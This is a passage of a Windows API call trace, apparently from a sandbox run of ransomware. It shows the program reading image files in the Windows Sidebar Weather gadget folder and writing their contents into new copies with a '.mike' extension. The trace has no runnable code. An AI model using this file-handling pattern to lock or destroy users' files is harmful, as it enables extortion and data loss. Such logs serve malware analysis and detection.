lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.772] WriteFile (in: hFile=0x284, lpBuffer=0x22e0a28*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22e0a28*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.773] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.776] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.mike", lpFilePart=0x0) returned 0x60 [0134.777] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.778] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.mike", lpFilePart=0x0) returned 0x60 [0134.778] WriteFile (in: hFile=0x284, lpBuffer=0x22f53a0*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22f53a0*, lpNumberOfBytesWritten=0x2af074*=0x980, lpOverlapped=0x0) returned 1 [0134.780] WriteFile (in: hFile=0x284, lpBuffer=0x22f8608*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22f8608*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.781] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png", dwFileAttributes=0x80) returned 0 [0134.782] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png", lpFilePart=0x0) returned 0x5b [0134.784] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.785] WriteFile (in: hFile=0x284, lpBuffer=0x22fdd44*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22fdd44*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.786] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.791] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", lpFilePart=0x0) returned 0x5f [0134.791] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.796] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", lpFilePart=0x0) returned 0x5f [0134.796] WriteFile (in: hFile=0x284, lpBuffer=0x210ee78*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x210ee78*, lpNumberOfBytesWritten=0x2af074*=0xb70, lpOverlapped=0x0) returned 1 [0134.798] WriteFile (in: hFile=0x284, lpBuffer=0x21120dc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21120dc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.798] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", lpFilePart=0x0) returned 0x5f [0134.799] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", lpFilePart=0x0) returned 0x5f [0134.799] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png", dwFileAttributes=0x80) returned 0 [0134.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png", lpFilePart=0x0) returned 0x5a [0134.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", lpFilePart=0x0) returned 0x5f [0134.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.800] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a05fe0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x19a05fe0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x19a2c140, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x3590)) returned 1 [0134.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.800] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png", lpFilePart=0x0) returned 0x5a [0134.801] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike", lpFilePart=0x0) returned 0x5f [0134.801] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png.mike")) returned 1 [0134.802] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.802] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.802] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0134.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.803] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.803] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.804] GetFileType (hFile=0x284) returned 0x1 [0134.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.804] GetFileType (hFile=0x284) returned 0x1 [0134.804] CloseHandle (hObject=0x284) returned 1 [0134.804] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.804] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.804] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0134.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.804] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.804] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), fInfoLevelId=0x0, lpFileInformation=0x2116410 | out: lpFileInformation=0x2116410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcea1910, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcea1910, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde3017c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2fcf)) returned 1 [0134.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.804] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), fInfoLevelId=0x0, lpFileInformation=0x21167bc | out: lpFileInformation=0x21167bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcea1910, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcea1910, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde3017c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2fcf)) returned 1 [0134.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.805] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.805] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.805] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.805] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.805] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.805] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0134.805] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.806] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.806] GetFileType (hFile=0x284) returned 0x1 [0134.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.806] GetFileType (hFile=0x284) returned 0x1 [0134.806] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0134.806] WriteFile (in: hFile=0x284, lpBuffer=0x21179d8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21179d8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.807] CloseHandle (hObject=0x284) returned 1 [0134.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0134.807] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), fInfoLevelId=0x0, lpFileInformation=0x21173f4 | out: lpFileInformation=0x21173f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcea1910, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcea1910, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde3017c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2fcf)) returned 1 [0134.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0134.807] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.807] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.807] GetFileType (hFile=0x284) returned 0x1 [0134.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.808] GetFileType (hFile=0x284) returned 0x1 [0134.808] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.808] ReadFile (in: hFile=0x284, lpBuffer=0x2118b5c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2118b5c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0134.813] CloseHandle (hObject=0x284) returned 1 [0134.814] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.814] GetFileType (hFile=0x284) returned 0x1 [0134.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.814] GetFileType (hFile=0x284) returned 0x1 [0134.814] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0134.814] WriteFile (in: hFile=0x284, lpBuffer=0x21230c4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21230c4*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0134.814] CloseHandle (hObject=0x284) returned 1 [0134.814] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.815] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.815] GetFileType (hFile=0x284) returned 0x1 [0134.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.815] GetFileType (hFile=0x284) returned 0x1 [0134.815] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.815] ReadFile (in: hFile=0x284, lpBuffer=0x2125bd4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2125bd4*, lpNumberOfBytesRead=0x2af080*=0x7cf, lpOverlapped=0x0) returned 1 [0134.815] CloseHandle (hObject=0x284) returned 1 [0134.816] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.816] GetFileType (hFile=0x284) returned 0x1 [0134.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.816] GetFileType (hFile=0x284) returned 0x1 [0134.816] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0134.816] WriteFile (in: hFile=0x284, lpBuffer=0x212b9a0*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2af074, 